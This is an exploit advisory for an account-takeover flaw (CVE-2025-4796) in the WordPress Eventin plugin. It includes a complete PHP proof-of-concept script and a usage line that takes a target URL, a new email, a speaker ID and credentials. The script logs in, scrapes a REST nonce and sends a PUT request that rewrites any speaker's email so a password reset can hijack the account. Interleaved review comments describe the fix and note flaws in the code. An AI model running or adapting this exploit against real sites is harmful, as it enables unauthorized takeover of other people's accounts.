============================================================================================================================================= | # Title : WordPress Eventin 4.0.34 Account Takeover Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/wp-event-solution/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796 [+] Summary : A critical vulnerability exists in the Speaker Management component of the target where an authenticated attacker can intercept the speaker update process and change any speaker’s registered email address without proper authorization. This flaw allows the attacker to hijack arbitrary accounts by modifying the email field and subsequently triggering a password reset workflow. The flaw is caused by insufficient authorization checks on the update_speaker endpoint combined with predictable nonce retrieval. [+] Affected Versions ---------------------------------------- All tested versions are confirmed vulnerable. Vendor has not released a fix at the time of publishing. [+] Vulnerability Details ---------------------------------------- The update_speaker.php endpoint accepts multiple fields including speaker_id and email without verifying that the user performing the action is authorized to update the target record. Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making cross-user actions possible. Impact: - Account takeover - Unauthorized email modification - Privilege escalation - Full speaker profile compromise [+] Usage ---------- Save the file: poc.php Run: php poc.php https://target-site.com new@mail.com 12 admin 123456 [+] Poc getMessage() . 
PHP_EOL; } }
/*
 * NOTE(review): the three tokens above are the tail of Nxploited_safe_print
 * (an echo of $e->getMessage() inside a catch); its head was lost in the
 * extraction of this page and is not visible here.
 *
 * What follows is the proof-of-concept for CVE-2025-4796 described in the
 * advisory above. From a defender's point of view the script shows the
 * observable footprint of the issue: a logged-in user fetches a REST nonce
 * from wp-admin, then sends a PUT to the Eventin speakers REST route
 * (/wp-json/eventin/v2/speakers/{id}) carrying only an "email" field. The
 * server-side remedy is an authorization check on that route that ties the
 * caller to the speaker record being modified (a nonce alone is a CSRF
 * control, not an authorization control); a detection rule can key on PUT
 * requests to that route that change "email" from accounts which do not own
 * the record.
 */

/* --------------------------- URL VALIDATION ---------------------------- */
/**
 * Normalise the target base URL: prepend "http://" when no scheme is given
 * and strip trailing slashes. Note that a scheme-less argument therefore
 * defaults to plaintext HTTP, so the credentials sent by Nxploited_login()
 * would travel unencrypted in that case.
 *
 * @param string $url  target as passed on the command line
 * @return string      base URL without trailing "/"
 */
function Nxploited_validate_url($url) {
    if (!preg_match('/^https?:\/\//i', $url)) {
        $url = "http://" . $url;
    }
    return rtrim($url, "/");
}

/* --------------------------- EMAIL VALIDATION ---------------------------- */
/**
 * Syntactic e-mail check. Returns the filtered address (string) on success
 * and false otherwise (filter_var semantics); callers test it for truthiness.
 *
 * @param string $email
 * @return string|false
 */
function Nxploited_validate_email($email) {
    return filter_var($email, FILTER_VALIDATE_EMAIL);
}

/* --------------------------- DISABLE SSL WARNINGS ---------------------------- */
/**
 * Turns off TLS certificate and hostname verification on the handle.
 * Despite the section title this does not merely silence warnings: every
 * request made through $ch afterwards will accept any certificate, so the
 * login credentials and session cookies are exposed to an on-path attacker.
 *
 * @param resource|\CurlHandle $ch  curl handle (passed by reference)
 */
function Nxploited_disable_ssl(&$ch) {
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}

/* --------------------------- LOGIN FUNCTION ---------------------------- */
/**
 * Authenticates against wp-login.php with a form POST and persists the
 * resulting cookies to "cookies.txt" in the current working directory
 * (the jar is never removed by this script, so session material stays on
 * disk after the run). Success is decided by the presence of a
 * "wordpress_logged_in" Set-Cookie in the response headers.
 *
 * @param string $url        base URL from Nxploited_validate_url()
 * @param string $username
 * @param string $password
 * @param string $user_agent
 * @return true              on success; the process exits with status 1 otherwise
 */
function Nxploited_login($url, $username, $password, $user_agent) {
    Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ...");
    usleep(500000); // 0.5 second (alternative to the disallowed sleep)
    $login_url = $url . "/wp-login.php";
    $data = http_build_query([
        'log' => $username,
        'pwd' => $password,
        'rememberme' => 'forever',
        'wp-submit' => 'Log In'
    ]);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true); // headers are needed below to inspect Set-Cookie
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    Nxploited_disable_ssl($ch);
    // Cookie jar on disk: written here, read back by the later requests.
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    $response = curl_exec($ch);
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $headers = substr($response, 0, $header_size);
    curl_close($ch);
    preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m);
    $cookies = $m[1];
    foreach ($cookies as $c) {
        if (strpos($c, "wordpress_logged_in") !== false) {
            Nxploited_safe_print("[+] تسجيل الدخول ناجح.");
            return true;
        }
    }
    Nxploited_safe_print("[-] فشل تسجيل الدخول.");
    exit(1);
}

/* --------------------------- NONCE EXTRACTION ---------------------------- */
/**
 * Loads /wp-admin/post-new.php with the saved session cookies and scrapes
 * the REST nonce out of the inline "createNonceMiddleware(...)" call.
 * This is the ordinary nonce every logged-in user receives; the advisory's
 * point is that possessing it is not the same as being authorized to edit a
 * given speaker record.
 *
 * @param string $url
 * @param string $user_agent
 * @return string  the nonce; the process exits with status 1 if none is found
 */
function Nxploited_extract_nonce($url, $user_agent) {
    Nxploited_safe_print("[*] استخراج Nonce ...");
    usleep(600000);
    $admin_url = $url . "/wp-admin/post-new.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $admin_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    Nxploited_disable_ssl($ch);
    $resp = curl_exec($ch);
    curl_close($ch);
    if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) {
        Nxploited_safe_print("[+] Nonce: " . $m[1]);
        return $m[1];
    }
    Nxploited_safe_print("[-] فشل استخراج Nonce.");
    exit(1);
}

/* --------------------------- UPDATE SPEAKER ---------------------------- */
/**
 * Sends the vulnerable request: a JSON PUT to
 * /wp-json/eventin/v2/speakers/{speaker_id} with {"email": ...} and the
 * X-WP-Nonce header. Success is a 200 response whose JSON body contains an
 * "email" key. On failure the decoded body is dumped and the process exits.
 *
 * @param string $url
 * @param string $speaker_id  target record id, taken verbatim from argv
 * @param string $email       already passed through Nxploited_validate_email()
 * @param string $nonce
 * @param string $user_agent
 * @return true
 */
function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) {
    Nxploited_safe_print("[*] تحديث بيانات المتحدث ...");
    usleep(600000);
    $api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id;
    $payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE);
    $headers = [
        "Content-Type: application/json",
        "X-WP-Nonce: $nonce",
        "User-Agent: $user_agent",
        // NOTE(review): this sends the raw contents of the cookie-jar file as
        // the Cookie header value. The jar is written by curl in its own
        // cookie-file format, not as name=value pairs, and CURLOPT_COOKIEFILE
        // is not set on this handle.
        "Cookie: " . trim(file_get_contents("cookies.txt"))
    ];
    $ch = curl_init($api_url);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    Nxploited_disable_ssl($ch);
    $resp = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    $json = json_decode($resp, true);
    if ($code === 200 && isset($json["email"])) {
        Nxploited_safe_print("[+] تم تحديث البريد إلى: $email");
        return true;
    }
    Nxploited_safe_print("[-] فشل التحديث!");
    print_r($json);
    exit(1);
}

/* --------------------------- SUCCESS BANNER ---------------------------- */
/**
 * Prints the closing banner with the modified record id and address.
 *
 * @param string $speaker_id
 * @param string $email
 */
function Nxploited_custom_success($speaker_id, $email) {
    Nxploited_safe_print("\n==============================");
    Nxploited_safe_print(" Exploitation Completed");
    Nxploited_safe_print("==============================");
    Nxploited_safe_print("Speaker ID : $speaker_id");
    Nxploited_safe_print("Email : $email");
    Nxploited_safe_print("Please reset your password using the new email.\n");
}

/* --------------------------- MAIN ---------------------------- */
// Positional arguments: <url> <new-email> <speaker-id> <username> <password>.
// The credentials are read from argv, so they are visible in the process
// list and in shell history of the machine running this script. No argument
// count check is performed; a missing argument raises an undefined-index
// notice rather than a usage message.
$url = Nxploited_validate_url($argv[1]);
$email = $argv[2];
$speaker_id = $argv[3];
$username = $argv[4];
$password = $argv[5];
$user_agent = "Mozilla/5.0 (Indoushka PoC)";
if (!Nxploited_validate_email($email)) {
    Nxploited_safe_print("[-] البريد غير صالح.");
    exit(1);
}
// Each step exits the process itself on failure, so there is no error
// handling at this level.
Nxploited_login($url, $username, $password, $user_agent);
$nonce = Nxploited_extract_nonce($url, $user_agent);
Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent);
Nxploited_custom_success($speaker_id, $email);
?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================